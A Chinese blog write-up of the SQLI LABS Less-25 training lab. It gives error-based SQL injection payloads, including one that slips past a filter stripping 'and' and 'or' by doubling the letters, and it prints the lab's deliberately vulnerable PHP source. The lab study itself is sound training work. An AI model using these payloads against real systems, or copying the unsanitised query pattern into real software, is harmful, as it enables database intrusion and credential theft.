SQLI LABS | Less-25 GET-Error Based-All Your OR & AND Belong To Us-String Single Quote

最新推荐文章于 2025-08-14 10:16:47 发布

原创最新推荐文章于 2025-08-14 10:16:47 发布 · 476 阅读

7 ·

CC 4.0 BY-SA版权

文章标签：

#less #android #adb #网络安全

网络安全 — 靶场笔记合集专栏收录该内容

227 篇文章

订阅专栏

关注这个靶场的其它相关笔记：SQLI LABS —— 靶场笔记合集-CSDN博客

0x01：过关流程

输入下面的链接进入靶场（如果你的地址和我不一样，按照你本地的环境来）：

 http://localhost/sqli-labs/Less-25/

靶场提示 Please input the ID as parameter with numeric value 要我们输入一个数字型的 ID 作为参数进行查询，那我们就按它的意思传入 id 看看网页返回的结果：

可以看到，服务器返回了对应 id 用户的登录名与登录密码。此时，我们可以再输入几个数据进行测试：

 测试 Payload 01: ?id=1   # 结果: Your Login name:Dumb      Your Password:Dumb
 测试 Payload 02: ?id=2   # 结果: Your Login name:Angelina  Your Password:I-kill-you
 测试 Payload 03: ?id=2-1 # 结果: Your Login name:Angelina  Your Password:I-kill-you
 测试 Payload 04: ?id=1'  # 结果: 报错

如上，既然能返回错误信息，那这里我们就使用报错注入，传入如下 Payload：

 ?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1) --+

针对后端这种关键词置空的方式，我们采用双写绕过即可，Payload 如下：

 ?id=1' aandnd updatexml(1,concat(0x7e,database(),0x7e),1) --+

可以看到，我们已经成功获取了当前站点使用的后端数据库的信息。至此，SQLI LABS Less-25 GET-Error Based-All Your OR & AND Belong To Us-String Single Quote 成功过关。

0x02：源码分析

下面是 SQLI LABS Less-25 GET-Error Based-All Your OR & AND Belong To Us-String Single Quote 后端的部分源码，以及笔者做的笔记：

 <?php
 //including the Mysql connect parameters.
 include("../sql-connections/sqli-connect.php");
 
 
 // take the variables 
 if (isset($_GET['id'])) {
     $id = $_GET['id'];  // 获取 id 的参数
     //logging the connection parameters to a file for analysis.
     $fp = fopen('result.txt', 'a');
     fwrite($fp, 'ID:' . $id . "\n");
     fclose($fp);
 
     //fiddling with comments
     $id = blacklist($id);   // 过滤 and & or
     //echo "<br>";
     //echo $id;
     //echo "<br>";
     $hint = $id;
 
     // connectivity 
     // 过滤的不好，导致依旧存在 SQL 注入漏洞
     $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
     $result = mysqli_query($con1, $sql);
     $row = mysqli_fetch_array($result, MYSQLI_BOTH);
     if ($row) {
         echo "<font size='5' color= '#99FF00'>";
         echo 'Your Login name:' . $row['username'];
         echo "<br>";
         echo 'Your Password:' . $row['password'];
         echo "</font>";
     } else {
         echo '<font color= "#FFFF00">';
         print_r(mysqli_error($con1)); // 当未查询出结果时，会显示报错注入
         echo "</font>";
     }
 } else {
     echo "Please input the ID as parameter with numeric value";
 }
 
 function blacklist($id)
 {   // 过滤掉传入参数中的 and 与 or
     $id = preg_replace('/or/i', "", $id);           //strip out OR (non case sensitive)
     $id = preg_replace('/AND/i', "", $id);      //Strip out AND (non case sensitive)
 
     return $id;
 }
 ?>